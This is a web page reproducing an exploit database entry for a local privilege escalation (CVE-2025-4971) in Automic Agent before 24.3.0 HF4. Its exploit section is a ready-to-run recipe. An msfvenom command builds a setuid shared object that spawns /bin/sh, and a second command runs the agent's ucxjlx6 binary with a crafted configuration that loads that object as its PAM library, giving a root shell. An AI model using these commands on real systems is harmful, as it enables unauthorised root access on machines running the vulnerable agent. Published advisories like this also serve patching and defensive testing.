Automic Agent 24.3.0 HF4 – Privilege Escalation

May 29, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title Automic Agent 24.3.0 HF4 – Privilege Escalation
Exploit ID EDB-ID:52309
Type exploitdb
Published 2025-05-29T00:00:00
Modified 2025-05-29T00:00:00

CVSS Information

CVSS Score 8.5
Severity HIGH
Vector CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/SC:L/VI:H/SI:L/VA:H/SA:L

CVE Information

  • CVE-2025-4971

Exploit Description

Exploit Title: Automic Agent 24.3.0 HF4 – Privilege Escalation Date: 26.05.2025…

Exploit Code

# Exploit Title: Automic Agent 24.3.0 HF4 – Privilege Escalation

# Date: 26.05.2025

# Exploit Author: Flora SchΓ€fer

# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation

# Version: <24.3.0 HF4, <21.0.13 HF1
# Tested on: Linux

# CVE : CVE-2025-4971

1. Generate shared object file using msfvenom

$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD=”/bin/sh” -f elf-so > /tmp/sh.so

2. Run the ucxjlx6 executable as follows

$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")

View Full Exploit Details

πŸ’­ Join the Security Discussion

πŸ”’ Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.